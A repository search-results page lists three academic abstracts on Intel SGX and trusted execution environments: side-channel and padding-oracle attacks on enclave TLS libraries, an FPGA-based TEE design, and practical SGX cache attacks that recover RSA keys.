2,918 research outputs found
Stacco: Differentially Analyzing Side-Channel Traces for Detecting SSL/TLS Vulnerabilities in Secure Enclaves
Intel Software Guard Extension (SGX) offers software applications enclave to
protect their confidentiality and integrity from malicious operating systems.
The SSL/TLS protocol, which is the de facto standard for protecting
transport-layer network communications, has been broadly deployed for a secure
communication channel. However, in this paper, we show that the marriage
between SGX and SSL may not be smooth sailing.
Particularly, we consider a category of side-channel attacks against SSL/TLS
implementations in secure enclaves, which we call the control-flow inference
attacks. In these attacks, the malicious operating system kernel may perform a
powerful man-in-the-kernel attack to collect execution traces of the enclave
programs at page, cacheline, or branch level, while positioning itself in the
middle of the two communicating parties. At the center of our work is a
differential analysis framework, dubbed Stacco, to dynamically analyze the
SSL/TLS implementations and detect vulnerabilities that can be exploited as
decryption oracles. Surprisingly, we found exploitable vulnerabilities in the
latest versions of all the SSL/TLS libraries we have examined.
To validate the detected vulnerabilities, we developed a man-in-the-kernel
adversary to demonstrate Bleichenbacher attacks against the latest OpenSSL
library running in the SGX enclave (with the help of Graphene) and completely
broke the PreMasterSecret encrypted by a 4096-bit RSA public key with only
57286 queries. We also conducted CBC padding oracle attacks against the latest
GnuTLS running in Graphene-SGX and an open-source SGX-implementation of mbedTLS
(i.e., mbedTLS-SGX) that runs directly inside the enclave, and showed that it
only needs 48388 and 25717 queries, respectively, to break one block of AES
ciphertext. Empirical evaluation suggests these man-in-the-kernel attacks can
be completed within 1 or 2 hours.Comment: CCS 17, October 30-November 3, 2017, Dallas, TX, US
Trusted execution environments leveraging reconfigurable FPGA technology
Compartmentalization techniques like Trusted
Execution Environments (TEEs) are a well-established security
strategy to provide increasing integrity and confidentiality for
applications, from the edge to the cloud. TEEs are used to protect
sensitive data and run security-critical applications on secure
execution environments, isolated from the rest of the system.
Notwithstanding, over the last few years, TEEs have been proven
weak, as either TEEs built upon security-oriented hardware
extensions (Arm TrustZone, Intel SGX) or resorting to dedicated
secure elements were exploited multiple times. We present and
discuss a novel TEE design that leverages reconfigurable FPGA
technology. The main novelty relies on leveraging the
programmable logic (PL) to create secure enclaves by instantiating
a customized and dedicated security processor per application on
a per-need basis. Unlike other TEE designs, our approach can
provide high-bandwidth connections and physical on-chip
isolation. We present a proof-of-concept (PoC) implementation
targeting a Xilinx Zynq Ultrascale+ based platform and we detail
how our design is interoperable with existing TEE stacks and
compliant with the GlobalPlatform specification. To demonstrate
the practicability of our approach in real-world applications, we
run a legacy open-source bitcoin wallet.This work has been supported by FCT - Fundação para a
Ciência e Tecnologia (FCT) within the R&D Units Project
Scope UIDB/00319/2020 and grant SFRH/BD/145209/2019
Software Grand Exposure: SGX Cache Attacks Are Practical
Side-channel information leakage is a known limitation of SGX. Researchers
have demonstrated that secret-dependent information can be extracted from
enclave execution through page-fault access patterns. Consequently, various
recent research efforts are actively seeking countermeasures to SGX
side-channel attacks. It is widely assumed that SGX may be vulnerable to other
side channels, such as cache access pattern monitoring, as well. However, prior
to our work, the practicality and the extent of such information leakage was
not studied.
In this paper we demonstrate that cache-based attacks are indeed a serious
threat to the confidentiality of SGX-protected programs. Our goal was to design
an attack that is hard to mitigate using known defenses, and therefore we mount
our attack without interrupting enclave execution. This approach has major
technical challenges, since the existing cache monitoring techniques experience
significant noise if the victim process is not interrupted. We designed and
implemented novel attack techniques to reduce this noise by leveraging the
capabilities of the privileged adversary. Our attacks are able to recover
confidential information from SGX enclaves, which we illustrate in two example
cases: extraction of an entire RSA-2048 key during RSA decryption, and
detection of specific human genome sequences during genomic indexing. We show
that our attacks are more effective than previous cache attacks and harder to
mitigate than previous SGX side-channel attacks
- …